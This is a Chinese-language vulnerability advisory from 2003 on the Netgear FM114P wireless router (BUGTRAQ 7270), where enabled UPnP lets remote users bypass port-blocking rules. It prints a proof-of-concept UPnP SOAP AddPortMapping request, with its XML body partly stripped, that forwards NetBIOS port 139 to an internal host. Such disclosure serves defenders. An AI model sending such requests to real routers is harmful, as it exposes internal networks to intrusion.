发布日期：2003-04-03
更新日期：2003-04-08

受影响系统：

Netgear FM114P

描述：

---

BUGTRAQ  ID: 7270

Netgear FM114P ProSafe是一款无线网络路由器。

Netgear FM114P ProSafe无线网络路由器在使用UPnP功能时其端口阻挡规则漏洞，远程攻击者可以利用这个漏洞绕过规则访问受限端口。

Netgear FM114P允许对部分端口进行阻挡，可限制外部用户访问内部网络或限制内部用户连接WAN，如果设备中远程访问和UPnP功能开启的情况下，远程用户可以提交UPnP SOAP请求连接绕过规则访问受限制端口，

<*来源：Bj?rn Stickler （stickler@rbg.informatik.tu-darmstadt.de）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104940758020372&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Bj?rn Stickler （stickler@rbg.informatik.tu-darmstadt.de）提供了如下测试方法：

--- sample for passing port 139 (netbios) from internal ip 192.168.0.2:  ---

POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache






139
TCP
139
192.168.0.6
1
NetBios
0

建议：

---

厂商补丁：

Netgear
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.netgear.com/

浏览次数：3149
严重程度：0（网友投票）